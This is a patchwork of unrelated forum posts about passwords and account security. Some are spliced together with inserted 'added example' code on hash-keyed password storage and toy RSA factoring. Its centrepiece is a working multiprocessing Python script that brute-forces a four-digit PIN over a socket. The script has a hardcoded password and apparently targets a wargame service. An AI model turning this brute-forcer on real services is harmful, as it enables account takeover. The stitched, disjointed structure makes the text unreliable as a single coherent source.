I have what appears to be a GUID and a password. But no recollection of what service I used or if I even purchased / transferred or made a transaction with them back in 2017. Any way to check to see if I have anything in here and retrieve it? My current BTC is on a platform I use regularly, this was prior to me setting up my current process last year… Any advice?
My program brute-forces a password. The password is a string composed of a key and a four digit numeric code. The key is known so we are basically brute-forcing between 0000 through to 9999
An example password is:
I updated that script I wrote to take advantage of multiprocessing in order to run faster.
The basic idea is to divide the task by the number of CPUs available.
There are two Events set up:
- prnt_sig_found is used by subprocesses to tell the parent if they succeed in guessing the right password.
- The parent process then uses child_sig_term to halt each subprocess.
My Python’s rusty and I think I made some bad choices. It would be useful to have my assumptions invalidated. 🙂
```python
#!/usr/bin/env python
# coding: utf-8
import multiprocessing as mp
import socket
import time
import math
import sys
import os


class Connection:
    def __init__(self, pin=0, max_iter=10000, sock=None):
        print('initializing socket instance ...')
        self.pin = pin
        self.max_iter = max_iter
        self.password = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ'
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def p_name(self):
        return mp.current_process().name

    def connect(self, host='127.0.0.1', port=30002):
        print(self.p_name(), 'connecting ...', host, port)
        self.sock.connect((host, port))
        print(self.p_name(), 'connection successful.')

    def write(self, msg):
        # msg must be bytes: sendall() does not accept str in Python 3
        print(self.p_name(), 'sending', msg)
        self.sock.sendall(msg)

    def read(self):
        print(self.p_name(), 'reading data ...')
        data = self.sock.recv(4096)
        return data

    def close(self):
        try:
            self.sock.shutdown(0)
            self.sock.close()
        except OSError:
            # socket was never connected or is already closed
            pass

    def execute(self, child_sig_term, prnt_sig_found):
        start_time = time.time()
        print(self.p_name(), 'executing ...')
        self.connect()
        self.write(b'greetings !')
        welcome_str = self.read()
        print(welcome_str)
        while self.pin < self.max_iter:
            if child_sig_term.is_set():
                break
            pin_str = str(self.pin).zfill(4)
            # add newline char to flush message or it doesn't get sent
            message = self.password + " " + pin_str + "\n"
            self.write(message.encode())
            received_msg = self.read()
            # recv() returns bytes, so compare against a bytes literal
            if b'Wrong' in received_msg:
                print(self.p_name(), 'Wrong guess', pin_str)
            else:
                print('_________________found_____________', received_msg)
                prnt_sig_found.set()
                break
            self.pin += 1
            time.sleep(0.5)
        end_time = time.time()
        total_time = end_time - start_time
        print(self.p_name(), "start: " + str(self.pin), ' end: ' + str(self.max_iter),
              'total_time: ', str((total_time) / 60) + ' minutes')


def main():
    print('main')
    # lists, not tuples: both are appended to below
    connections = []
    processes = []
    # requires read/write access to /dev/shm
    prnt_sig_found = mp.Event()
    child_sig_term = mp.Event()
    MAX_ITER_COUNT = 10000
    processor_count = mp.cpu_count()
    # math.floor returns a float in python 2
    step_count = int(math.floor(MAX_ITER_COUNT / processor_count))
    end = step_count
    start = 0
    print('Initial values ->', processor_count, step_count, start, end)
    try:
        for i in range(processor_count):
            conn = Connection(pin=start, max_iter=end)
            proc_name = 'BF( ' + str(start) + ' - ' + str(end) + ' )'
            process = mp.Process(name=proc_name, target=conn.execute,
                                 args=(child_sig_term, prnt_sig_found))
            process.daemon = True
            connections.append(conn)
            processes.append(process)
            # max_iter is exclusive, so the next range starts at the old end
            start = end
            end = start + step_count
            # the last worker takes the remainder; never exceed the maximum
            if i == processor_count - 2 or MAX_ITER_COUNT < end:
                end = MAX_ITER_COUNT
            if MAX_ITER_COUNT < start:
                start = MAX_ITER_COUNT
        # start all processes
        for process in processes:
            process.start()
        # block until a child reports success or every child has finished
        while any(process.is_alive() for process in processes):
            if prnt_sig_found.wait(0.5):
                break
        # tell the remaining children to stop, then wait for them to exit
        child_sig_term.set()
        for process in processes:
            process.join()
    finally:
        for conn in connections:
            conn.close()
        for process in processes:
            if process.is_alive():
                process.terminate()


if __name__ == '__main__':
    main()
```
I just found out that an e-commerce platform (similar to Shopify) I was planning on using allows me to see my password. I know I can’t assume anything and I should (probably) just run away from it, but it got me curious: is there a way to do it securely?
I mean, what if they use the password’s hash as an encryption key to encrypt the password itself? If done properly, could something like this be a reasonable solution?
Moreover, does anyone have any idea why on earth an e-commerce platform would choose to do it?
And no, I don’t plan to implement anything like this.
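Added example, not part of the original post: the scheme asked about, with PBKDF2 as the hash and a SHAKE-256 XOR keystream standing in for a real cipher (both are assumptions, as are all function names). It shows that because the hash has to be stored for login, the key sits in the same row as the ciphertext, and that keeping the key out of the row leaves a feature that only works for someone who has already typed the password.

```python
import hashlib
import hmac
import os


def kdf(password: str, salt: bytes) -> bytes:
    # Slow password hash; the login check compares against this value.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def xor_stream(key: bytes, data: bytes) -> bytes:
    # Stand-in cipher (assumption: a real system would use an AEAD such as
    # AES-GCM). XOR with a SHAKE-256 keystream, so encrypt == decrypt.
    stream = hashlib.shake_256(key).digest(len(data))
    return bytes(a ^ b for a, b in zip(data, stream))


def store_hash_as_key(password: str) -> dict:
    # Scheme from the question: encrypt the password under its own hash.
    # The hash must be stored for login, so key and ciphertext share a row.
    salt = os.urandom(16)
    pw_hash = kdf(password, salt)
    return {"salt": salt, "hash": pw_hash,
            "enc": xor_stream(pw_hash, password.encode())}


def login(row: dict, attempt: str) -> bool:
    return hmac.compare_digest(kdf(attempt, row["salt"]), row["hash"])


def reveal_from_row(row: dict) -> str:
    # Needs nothing but the row: the "show my password" page and anyone
    # holding a copy of the database are in the same position.
    return xor_stream(row["hash"], row["enc"]).decode(errors="replace")


def store_separate_key(password: str) -> dict:
    # Variant: derive the key with a second salt and never store the key.
    row = store_hash_as_key(password)
    key_salt = os.urandom(16)
    row.update(key_salt=key_salt,
               enc=xor_stream(kdf(password, key_salt), password.encode()))
    return row


def reveal_with_password(row: dict, typed: str) -> str:
    # Decrypts only for someone who typed the right password, so the page
    # can no longer show anything the user does not already know.
    data = xor_stream(kdf(typed, row["key_salt"]), row["enc"])
    return data.decode(errors="replace")
```
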
There are existing users who login with their email or social accounts. How will existing users login if we get rid of social and email login?
I need to show a message to the user if the user tries to create an account and that email address is already taken, and, if that email address belongs to the user, then reset the password for the account associated with that email address.
There might be some cases where this could happen.
- The user created an account before and forgot about it
- Someone has used their email address to create an account
The Reset Password Failed Error failed from the perspective of an alternate Admin User. I also tried it from Recovery Mode where the user didn’t appear. In Single User Mode using the ls command, the user does appear. When attempting the reset from Single User Mode after using mount -uw / then launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist then passwd username, it offers the reset, but when attempting, it gives the error that the password is too short when it clearly isn’t too short. How can I recover this user? I’ve also reset user permissions to no avail.
I have a (supposed to be) headless server running Ubuntu 18.04 where the boot volume is LUKS encrypted. I am unable to redirect the initial boot process to the serial console (running PuTTY from a Windows 10 PC) so that I can enter the password. At this point the only option I have is to leave the enclosure open with a video card and USB keyboard installed so I can enter the password–not a workable option.
The serial console port (from the W10 PC) sees the initial GRUB menu up to the “Press ESC for options”, but nothing until I enter the password. After I enter the password, the remainder of the boot process output appears on the serial console port and I can login. Initially I couldn’t even get the output after the password and the console login to work. To get that far I did the following:
- Edit /etc/default/grub file so that GRUB_CMDLINE_LINUX reads “console=tty1 console=ttyS5,115200”
- Update GRUB with sudo update-grub
- sudo systemctl start getty@ttyS5
- sudo systemctl enable getty@ttyS5
I need to get the entire boot sequence, including prompt for LUKS password redirected to the serial console port. I’ve tried so many different procedures I can’t possibly put them all down, including a half dozen from this site. Someone please help, I need to be able to seal up the enclosure, with the video card and USB keyboard removed and all interaction with the boot process managed from the serial console port.
Many thanks to the Ubuntu Community in advance
Actually I think if you try to login and use a wrong password, there could be a link appearing like “forgot password?”
This would send you a new one via email. Since you do not need more information apart from the email/login that should work just fine.
I would however agree with the other posts, that there should not be a button on the login form but just a link, which directs you to a form which asks you for your email/username.
Due to Charles Boyung's comment I did rethink my statement and came to the conclusion that his criticism is actually well put. I do still think, though, that it is not a bad idea to give the possibility to register in the login form.
This is, because often the user is asked to login while trying to access a certain page, if the user has no account, here is the place to have him sign up.
It could work like this.
The form („Login Form“ for the screen reader) has a field for email & password to login and the default action on hitting enter is to login.
There is however a button register. When clicked, the user is redirected to a different form with all necessary information (if there is more needed apart from email & password). If the user did fill in the email and password, it gets passed to the other form.
In case you do not need more information, clicking on register would either present you with a success page if you filled in your information already or if you did not, with a form to fill in the information and just one button „register“.
This way you do have 3 forms, but you can combine them so that it is, in my opinion easy for the user and very convenient.
I’ve read/watched a lot about Quantum Computers, trying to really get into the physics of it. Seems like the topic is poorly explained. I do understand that it takes a lot of qubits to beat modern encryption, so there’s no concern for a while longer.
So while I do see lots of articles/videos claiming Shor’s algorithm will defeat encryption, nothing has explained how the key is captured, and/or how the hashing/salting of the key is undone such that the algorithm has a proper number to work with. Seems like those are pretty big hurdles to overcome regardless of the algorithm.
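In RSA, the number Shor's algorithm works on is the modulus n, which is published as part of the public key, so no key has to be captured and no hash or salt is involved. Added example, not part of the original post: the classical steps of Shor's algorithm recomputing a private exponent from a public key alone, using a constructed textbook-sized key and a brute-force period search standing in for the quantum step (function names are hypothetical).

```python
from math import gcd

# Constructed toy RSA public key (textbook-sized; real moduli are 2048+ bits).
PUBLIC_N, PUBLIC_E = 3233, 17


def order(a: int, n: int) -> int:
    # Smallest r > 0 with a**r % n == 1. Finding this period is the step
    # Shor's algorithm speeds up; brute force stands in for it here.
    r, x = 1, a % n
    while x != 1:
        x = x * a % n
        r += 1
    return r


def factor_modulus(n: int) -> tuple:
    # Classical wrapper of Shor's algorithm: turn a period into a factor.
    for a in range(2, n):
        g = gcd(a, n)
        if g != 1:                       # a already shares a factor with n
            return tuple(sorted((g, n // g)))
        r = order(a, n)
        y = pow(a, r // 2, n)
        if r % 2 == 0 and y != n - 1:    # y*y == 1 (mod n) and y != +-1
            p = gcd(y - 1, n)
            return tuple(sorted((p, n // p)))
    raise ValueError("no factor found (n is prime)")


def private_exponent(n: int, e: int) -> int:
    # Everything used here comes from the public key alone.
    p, q = factor_modulus(n)
    return pow(e, -1, (p - 1) * (q - 1))


def demo() -> int:
    # Constructed message: encrypt with the public key, then decrypt with
    # the private exponent recomputed from (n, e).
    ciphertext = pow(65, PUBLIC_E, PUBLIC_N)
    return pow(ciphertext, private_exponent(PUBLIC_N, PUBLIC_E), PUBLIC_N)
```
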
This probably wouldn’t be a great idea.
It would be easier to hack
If you did this at the start/middle/end of the word, it would take barely any time to brute-force the account. Basically, that means that the hacker could systematically use dictionary words until they found the correct one.
It’s hard to implement
Also, your login form should be focused and simple and neat, and shouldn’t have all sorts of weird features like this.
Users probably won’t like it
Users are used to forgetting passwords, and they might be a bit confused/shocked/angry/scared if, on the forgot password page, it said the first letters of their password in large letters.
Users are also used to getting reset emails and immediately going to their inbox after pressing the reset button. If they were just faced with two letters and still couldn’t know what it was, then they wouldn’t be able to get in.
Let’s look at this from a user’s point of view.
- You set up an account
- You want it to be very secure (of course)
- You’ve forgotten your password
- You can’t remember it at all
- You do a password reset
- It then shows you the first and last letter of your password in large pink and purple letters
- You can remember your password now! Hurrah!
Now, let’s look at this from a hacker’s point of view.
- You find out about this website
- You see that the password reset shows you the first and last letter of your password in large pink and purple letters
- You then put the user’s account username into the password reset
- Then, the letters are revealed
- You then get a robot to try out all the dictionary words starting with those letters
- You have then got access to the user’s login details.
Now then, this would not be good. No it wouldn’t.